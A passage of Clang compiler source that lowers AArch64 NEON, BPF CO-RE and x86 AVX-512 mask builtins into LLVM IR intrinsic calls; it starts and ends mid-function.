Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlvq_u16: {
Int = Intrinsic::aarch64_neon_uaddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vaddlv_s8: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlv_s16: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 4);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vaddlvq_s8: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int8Ty, 16);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vaddlvq_s16: {
Int = Intrinsic::aarch64_neon_saddlv;
Ty = Int32Ty;
VTy = llvm::FixedVectorType::get(Int16Ty, 8);
llvm::Type *Tys[2] = { Ty, VTy };
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vaddlv");
}
case NEON::BI__builtin_neon_vsri_n_v:
case NEON::BI__builtin_neon_vsriq_n_v: {
Int = Intrinsic::aarch64_neon_vsri;
llvm::Function *Intrin = CGM.getIntrinsic(Int, Ty);
return EmitNeonCall(Intrin, Ops, "vsri_n");
}
case NEON::BI__builtin_neon_vsli_n_v:
case NEON::BI__builtin_neon_vsliq_n_v: {
Int = Intrinsic::aarch64_neon_vsli;
llvm::Function *Intrin = CGM.getIntrinsic(Int, Ty);
return EmitNeonCall(Intrin, Ops, "vsli_n");
}
case NEON::BI__builtin_neon_vsra_n_v:
case NEON::BI__builtin_neon_vsraq_n_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = EmitNeonRShiftImm(Ops[1], Ops[2], Ty, usgn, "vsra_n");
return Builder.CreateAdd(Ops[0], Ops[1]);
case NEON::BI__builtin_neon_vrsra_n_v:
case NEON::BI__builtin_neon_vrsraq_n_v: {
Int = usgn ? Intrinsic::aarch64_neon_urshl : Intrinsic::aarch64_neon_srshl;
SmallVector<llvm::Value*,2> TmpOps;
TmpOps.push_back(Ops[1]);
TmpOps.push_back(Ops[2]);
Function* F = CGM.getIntrinsic(Int, Ty);
llvm::Value *tmp = EmitNeonCall(F, TmpOps, "vrshr_n", 1, true);
Ops[0] = Builder.CreateBitCast(Ops[0], VTy);
return Builder.CreateAdd(Ops[0], tmp);
}
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(VTy));
return Builder.CreateAlignedLoad(VTy, Ops[0], PtrOp0.getAlignment());
}
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(VTy));
Ops[1] = Builder.CreateBitCast(Ops[1], VTy);
return Builder.CreateAlignedStore(Ops[1], Ops[0], PtrOp0.getAlignment());
case NEON::BI__builtin_neon_vld1_lane_v:
case NEON::BI__builtin_neon_vld1q_lane_v: {
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ty = llvm::PointerType::getUnqual(VTy->getElementType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[0] = Builder.CreateAlignedLoad(VTy->getElementType(), Ops[0],
PtrOp0.getAlignment());
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vld1_lane");
}
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v: {
Value *V = UndefValue::get(Ty);
Ty = llvm::PointerType::getUnqual(VTy->getElementType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[0] = Builder.CreateAlignedLoad(VTy->getElementType(), Ops[0],
PtrOp0.getAlignment());
llvm::Constant *CI = ConstantInt::get(Int32Ty, 0);
Ops[0] = Builder.CreateInsertElement(V, Ops[0], CI);
return EmitNeonSplat(Ops[0], CI);
}
case NEON::BI__builtin_neon_vst1_lane_v:
case NEON::BI__builtin_neon_vst1q_lane_v:
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[1] = Builder.CreateExtractElement(Ops[1], Ops[2]);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
return Builder.CreateAlignedStore(Ops[1], Builder.CreateBitCast(Ops[0], Ty),
PtrOp0.getAlignment());
case NEON::BI__builtin_neon_vld2_v:
case NEON::BI__builtin_neon_vld2q_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld2, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld2");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld3_v:
case NEON::BI__builtin_neon_vld3q_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld3, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld3");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld4_v:
case NEON::BI__builtin_neon_vld4q_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy);
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld4, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld4");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld2_dup_v:
case NEON::BI__builtin_neon_vld2q_dup_v: {
llvm::Type *PTy =
llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld2r, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld2");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld3_dup_v:
case NEON::BI__builtin_neon_vld3q_dup_v: {
llvm::Type *PTy =
llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld3r, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld3");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld4_dup_v:
case NEON::BI__builtin_neon_vld4q_dup_v: {
llvm::Type *PTy =
llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld4r, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld4");
Ops[0] = Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld2_lane_v:
case NEON::BI__builtin_neon_vld2q_lane_v: {
llvm::Type *Tys[2] = { VTy, Ops[1]->getType() };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld2lane, Tys);
std::rotate(Ops.begin() + 1, Ops.begin() + 2, Ops.end());
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[3] = Builder.CreateZExt(Ops[3], Int64Ty);
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), "vld2_lane");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld3_lane_v:
case NEON::BI__builtin_neon_vld3q_lane_v: {
llvm::Type *Tys[2] = { VTy, Ops[1]->getType() };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld3lane, Tys);
std::rotate(Ops.begin() + 1, Ops.begin() + 2, Ops.end());
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[3] = Builder.CreateBitCast(Ops[3], Ty);
Ops[4] = Builder.CreateZExt(Ops[4], Int64Ty);
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), "vld3_lane");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld4_lane_v:
case NEON::BI__builtin_neon_vld4q_lane_v: {
llvm::Type *Tys[2] = { VTy, Ops[1]->getType() };
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_neon_ld4lane, Tys);
std::rotate(Ops.begin() + 1, Ops.begin() + 2, Ops.end());
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Ops[3] = Builder.CreateBitCast(Ops[3], Ty);
Ops[4] = Builder.CreateBitCast(Ops[4], Ty);
Ops[5] = Builder.CreateZExt(Ops[5], Int64Ty);
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), "vld4_lane");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vst2_v:
case NEON::BI__builtin_neon_vst2q_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
llvm::Type *Tys[2] = { VTy, Ops[2]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st2, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst2_lane_v:
case NEON::BI__builtin_neon_vst2q_lane_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
llvm::Type *Tys[2] = { VTy, Ops[3]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st2lane, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst3_v:
case NEON::BI__builtin_neon_vst3q_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
llvm::Type *Tys[2] = { VTy, Ops[3]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st3, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst3_lane_v:
case NEON::BI__builtin_neon_vst3q_lane_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
Ops[3] = Builder.CreateZExt(Ops[3], Int64Ty);
llvm::Type *Tys[2] = { VTy, Ops[4]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st3lane, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst4_v:
case NEON::BI__builtin_neon_vst4q_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
llvm::Type *Tys[2] = { VTy, Ops[4]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st4, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vst4_lane_v:
case NEON::BI__builtin_neon_vst4q_lane_v: {
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
Ops[4] = Builder.CreateZExt(Ops[4], Int64Ty);
llvm::Type *Tys[2] = { VTy, Ops[5]->getType() };
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_st4lane, Tys),
Ops, "");
}
case NEON::BI__builtin_neon_vtrn_v:
case NEON::BI__builtin_neon_vtrnq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back(i+vi);
Indices.push_back(i+e+vi);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vtrn");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vuzp_v:
case NEON::BI__builtin_neon_vuzpq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; ++i)
Indices.push_back(2*i+vi);
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vuzp");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vzip_v:
case NEON::BI__builtin_neon_vzipq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back((i + vi*e) >> 1);
Indices.push_back(((i + vi*e) >> 1)+e);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vzip");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vqtbl1q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl1, Ty),
Ops, "vtbl1");
}
case NEON::BI__builtin_neon_vqtbl2q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl2, Ty),
Ops, "vtbl2");
}
case NEON::BI__builtin_neon_vqtbl3q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl3, Ty),
Ops, "vtbl3");
}
case NEON::BI__builtin_neon_vqtbl4q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbl4, Ty),
Ops, "vtbl4");
}
case NEON::BI__builtin_neon_vqtbx1q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx1, Ty),
Ops, "vtbx1");
}
case NEON::BI__builtin_neon_vqtbx2q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx2, Ty),
Ops, "vtbx2");
}
case NEON::BI__builtin_neon_vqtbx3q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx3, Ty),
Ops, "vtbx3");
}
case NEON::BI__builtin_neon_vqtbx4q_v: {
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::aarch64_neon_tbx4, Ty),
Ops, "vtbx4");
}
case NEON::BI__builtin_neon_vsqadd_v:
case NEON::BI__builtin_neon_vsqaddq_v: {
Int = Intrinsic::aarch64_neon_usqadd;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vsqadd");
}
case NEON::BI__builtin_neon_vuqadd_v:
case NEON::BI__builtin_neon_vuqaddq_v: {
Int = Intrinsic::aarch64_neon_suqadd;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vuqadd");
}
}
}
Value *CodeGenFunction::EmitBPFBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
assert((BuiltinID == BPF::BI__builtin_preserve_field_info ||
BuiltinID == BPF::BI__builtin_btf_type_id ||
BuiltinID == BPF::BI__builtin_preserve_type_info ||
BuiltinID == BPF::BI__builtin_preserve_enum_value) &&
"unexpected BPF builtin");
// A sequence number, injected into IR builtin functions, to
// prevent CSE given the only difference of the funciton
// may just be the debuginfo metadata.
static uint32_t BuiltinSeqNum;
switch (BuiltinID) {
default:
llvm_unreachable("Unexpected BPF builtin");
case BPF::BI__builtin_preserve_field_info: {
const Expr *Arg = E->getArg(0);
bool IsBitField = Arg->IgnoreParens()->getObjectKind() == OK_BitField;
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(),
"using __builtin_preserve_field_info() without -g");
return IsBitField ? EmitLValue(Arg).getBitFieldPointer()
: EmitLValue(Arg).getPointer(*this);
}
// Enable underlying preserve_*_access_index() generation.
bool OldIsInPreservedAIRegion = IsInPreservedAIRegion;
IsInPreservedAIRegion = true;
Value *FieldAddr = IsBitField ? EmitLValue(Arg).getBitFieldPointer()
: EmitLValue(Arg).getPointer(*this);
IsInPreservedAIRegion = OldIsInPreservedAIRegion;
ConstantInt *C = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
Value *InfoKind = ConstantInt::get(Int64Ty, C->getSExtValue());
// Built the IR for the preserve_field_info intrinsic.
llvm::Function *FnGetFieldInfo = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_preserve_field_info,
{FieldAddr->getType()});
return Builder.CreateCall(FnGetFieldInfo, {FieldAddr, InfoKind});
}
case BPF::BI__builtin_btf_type_id:
case BPF::BI__builtin_preserve_type_info: {
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(), "using builtin function without -g");
return nullptr;
}
const Expr *Arg0 = E->getArg(0);
llvm::DIType *DbgInfo = getDebugInfo()->getOrCreateStandaloneType(
Arg0->getType(), Arg0->getExprLoc());
ConstantInt *Flag = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
Value *FlagValue = ConstantInt::get(Int64Ty, Flag->getSExtValue());
Value *SeqNumVal = ConstantInt::get(Int32Ty, BuiltinSeqNum++);
llvm::Function *FnDecl;
if (BuiltinID == BPF::BI__builtin_btf_type_id)
FnDecl = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_btf_type_id, {});
else
FnDecl = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_preserve_type_info, {});
CallInst *Fn = Builder.CreateCall(FnDecl, {SeqNumVal, FlagValue});
Fn->setMetadata(LLVMContext::MD_preserve_access_index, DbgInfo);
return Fn;
}
case BPF::BI__builtin_preserve_enum_value: {
if (!getDebugInfo()) {
CGM.Error(E->getExprLoc(), "using builtin function without -g");
return nullptr;
}
const Expr *Arg0 = E->getArg(0);
llvm::DIType *DbgInfo = getDebugInfo()->getOrCreateStandaloneType(
Arg0->getType(), Arg0->getExprLoc());
// Find enumerator
const auto *UO = cast<UnaryOperator>(Arg0->IgnoreParens());
const auto *CE = cast<CStyleCastExpr>(UO->getSubExpr());
const auto *DR = cast<DeclRefExpr>(CE->getSubExpr());
const auto *Enumerator = cast<EnumConstantDecl>(DR->getDecl());
auto &InitVal = Enumerator->getInitVal();
std::string InitValStr;
if (InitVal.isNegative() || InitVal > uint64_t(INT64_MAX))
InitValStr = std::to_string(InitVal.getSExtValue());
else
InitValStr = std::to_string(InitVal.getZExtValue());
std::string EnumStr = Enumerator->getNameAsString() + ":" + InitValStr;
Value *EnumStrVal = Builder.CreateGlobalStringPtr(EnumStr);
ConstantInt *Flag = cast<ConstantInt>(EmitScalarExpr(E->getArg(1)));
Value *FlagValue = ConstantInt::get(Int64Ty, Flag->getSExtValue());
Value *SeqNumVal = ConstantInt::get(Int32Ty, BuiltinSeqNum++);
llvm::Function *IntrinsicFn = llvm::Intrinsic::getDeclaration(
&CGM.getModule(), llvm::Intrinsic::bpf_preserve_enum_value, {});
CallInst *Fn =
Builder.CreateCall(IntrinsicFn, {SeqNumVal, EnumStrVal, FlagValue});
Fn->setMetadata(LLVMContext::MD_preserve_access_index, DbgInfo);
return Fn;
}
}
}
llvm::Value *CodeGenFunction::
BuildVector(ArrayRef<llvm::Value*> Ops) {
assert((Ops.size() & (Ops.size() - 1)) == 0 &&
"Not a power-of-two sized vector!");
bool AllConstants = true;
for (unsigned i = 0, e = Ops.size(); i != e && AllConstants; ++i)
AllConstants &= isa<Constant>(Ops[i]);
// If this is a constant vector, create a ConstantVector.
if (AllConstants) {
SmallVector<llvm::Constant*, 16> CstOps;
for (unsigned i = 0, e = Ops.size(); i != e; ++i)
CstOps.push_back(cast<Constant>(Ops[i]));
return llvm::ConstantVector::get(CstOps);
}
// Otherwise, insertelement the values to build the vector.
Value *Result = llvm::UndefValue::get(
llvm::FixedVectorType::get(Ops[0]->getType(), Ops.size()));
for (unsigned i = 0, e = Ops.size(); i != e; ++i)
Result = Builder.CreateInsertElement(Result, Ops[i], Builder.getInt32(i));
return Result;
}
// Convert the mask from an integer type to a vector of i1.
static Value *getMaskVecValue(CodeGenFunction &CGF, Value *Mask,
unsigned NumElts) {
auto *MaskTy = llvm::FixedVectorType::get(
CGF.Builder.getInt1Ty(),
cast<IntegerType>(Mask->getType())->getBitWidth());
Value *MaskVec = CGF.Builder.CreateBitCast(Mask, MaskTy);
// If we have less than 8 elements, then the starting mask was an i8 and
// we need to extract down to the right number of elements.
if (NumElts < 8) {
int Indices[4];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i;
MaskVec = CGF.Builder.CreateShuffleVector(MaskVec, MaskVec,
makeArrayRef(Indices, NumElts),
"extract");
}
return MaskVec;
}
static Value *EmitX86MaskedStore(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
Align Alignment) {
// Cast the pointer to right type.
Value *Ptr = CGF.Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(Ops[1]->getType()));
Value *MaskVec = getMaskVecValue(
CGF, Ops[2],
cast<llvm::FixedVectorType>(Ops[1]->getType())->getNumElements());
return CGF.Builder.CreateMaskedStore(Ops[1], Ptr, Alignment, MaskVec);
}
static Value *EmitX86MaskedLoad(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
Align Alignment) {
// Cast the pointer to right type.
llvm::Type *Ty = Ops[1]->getType();
Value *Ptr =
CGF.Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Value *MaskVec = getMaskVecValue(
CGF, Ops[2], cast<llvm::FixedVectorType>(Ty)->getNumElements());
return CGF.Builder.CreateMaskedLoad(Ty, Ptr, Alignment, MaskVec, Ops[1]);
}
static Value *EmitX86ExpandLoad(CodeGenFunction &CGF,
ArrayRef<Value *> Ops) {
auto *ResultTy = cast<llvm::VectorType>(Ops[1]->getType());
llvm::Type *PtrTy = ResultTy->getElementType();
// Cast the pointer to element type.
Value *Ptr = CGF.Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(PtrTy));
Value *MaskVec = getMaskVecValue(
CGF, Ops[2], cast<FixedVectorType>(ResultTy)->getNumElements());
llvm::Function *F = CGF.CGM.getIntrinsic(Intrinsic::masked_expandload,
ResultTy);
return CGF.Builder.CreateCall(F, { Ptr, MaskVec, Ops[1] });
}
static Value *EmitX86CompressExpand(CodeGenFunction &CGF,
ArrayRef<Value *> Ops,
bool IsCompress) {
auto *ResultTy = cast<llvm::FixedVectorType>(Ops[1]->getType());
Value *MaskVec = getMaskVecValue(CGF, Ops[2], ResultTy->getNumElements());
Intrinsic::ID IID = IsCompress ? Intrinsic::x86_avx512_mask_compress
: Intrinsic::x86_avx512_mask_expand;
llvm::Function *F = CGF.CGM.getIntrinsic(IID, ResultTy);
return CGF.Builder.CreateCall(F, { Ops[0], Ops[1], MaskVec });
}
static Value *EmitX86CompressStore(CodeGenFunction &CGF,
ArrayRef<Value *> Ops) {
auto *ResultTy = cast<llvm::FixedVectorType>(Ops[1]->getType());
llvm::Type *PtrTy = ResultTy->getElementType();
// Cast the pointer to element type.
Value *Ptr = CGF.Builder.CreateBitCast(Ops[0],
llvm::PointerType::getUnqual(PtrTy));
Value *MaskVec = getMaskVecValue(CGF, Ops[2], ResultTy->getNumElements());
llvm::Function *F = CGF.CGM.getIntrinsic(Intrinsic::masked_compressstore,
ResultTy);
return CGF.Builder.CreateCall(F, { Ops[1], Ptr, MaskVec });
}
static Value *EmitX86MaskLogic(CodeGenFunction &CGF, Instruction::BinaryOps Opc,
ArrayRef<Value *> Ops,
bool InvertLHS = false) {
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(CGF, Ops[0], NumElts);
Value *RHS = getMaskVecValue(CGF, Ops[1], NumElts);
if (InvertLHS)
LHS = CGF.Builder.CreateNot(LHS);
return CGF.Builder.CreateBitCast(CGF.Builder.CreateBinOp(Opc, LHS, RHS),
Ops[0]->getType());
}
static Value *EmitX86FunnelShift(CodeGenFunction &CGF, Value *Op0, Value *Op1,
Value *Amt, bool IsRight) {
llvm::Type *Ty = Op0->getType();
// Amount may be scalar immediate, in which case create a splat vector.
// Funnel shifts amounts are treated as modulo and types are all power-of-2 so
// we only care about the lowest log2 bits anyway.
if (Amt->getType() != Ty) {
unsigned NumElts = cast<llvm::FixedVectorType>(Ty)->getNumElements();
Amt = CGF.Builder.CreateIntCast(Amt, Ty->getScalarType(), false);
Amt = CGF.Builder.CreateVectorSplat(NumElts, Amt);
}
unsigned IID = IsRight ? Intrinsic::fshr : Intrinsic::fshl;
Function *F = CGF.CGM.getIntrinsic(IID, Ty);
return CGF.Builder.CreateCall(F, {Op0, Op1, Amt});
}
static Value *EmitX86vpcom(CodeGenFunction &CGF, ArrayRef<Value *> Ops,
bool IsSigned) {
Value *Op0 = Ops[0];
Value *Op1 = Ops[1];
llvm::Type *Ty = Op0->getType();
uint64_t Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x7;
CmpInst::Predicate Pred;
switch (Imm) {
case 0x0:
Pred = IsSigned ? ICmpInst::ICMP_SLT : ICmpInst::ICMP_ULT;
break;
case 0x1:
Pred = IsSigned ? ICmpInst::ICMP_SLE : ICmpInst::ICMP_ULE;
break;
case 0x2:
Pred = IsSigned ? ICmpInst::ICMP_SGT : ICmpInst::ICMP_UGT;
break;
case 0x3:
Pred = IsSigned ? ICmpInst::ICMP_SGE : ICmpInst::ICMP_UGE;
break;
case 0x4:
Pred = ICmpInst::ICMP_EQ;
break;
case 0x5:
Pred = ICmpInst::ICMP_NE;
break;
case 0x6:
return llvm::Constant::getNullValue(Ty); // FALSE
case 0x7:
return llvm::Constant::getAllOnesValue(Ty); // TRUE
default:
llvm_unreachable("Unexpected XOP vpcom/vpcomu predicate");
}
Value *Cmp = CGF.Builder.CreateICmp(Pred, Op0, Op1);
Value *Res = CGF.Builder.CreateSExt(Cmp, Ty);
return Res;
}
static Value *EmitX86Select(CodeGenFunction &CGF,
Value *Mask, Value *Op0, Value *Op1) {
// If the mask is all ones just return first argument.
if (const auto *C = dyn_cast<Constant>(Mask))
if (C->isAllOnesValue())
return Op0;
Mask = getMaskVecValue(
CGF, Mask, cast<llvm::FixedVectorType>(Op0->getType())->getNumElements());
return CGF.Builder.CreateSelect(Mask, Op0, Op1);
}
static Value *EmitX86ScalarSelect(CodeGenFunction &CGF,
Value *Mask, Value *Op0, Value *Op1) {
// If the mask is all ones just return first argument.
if (const auto *C = dyn_cast<Constant>(Mask))
if (C->isAllOnesValue())
return Op0;
auto *MaskTy = llvm::FixedVectorType::get(
CGF.Builder.getInt1Ty(), Mask->getType()->getIntegerBitWidth());
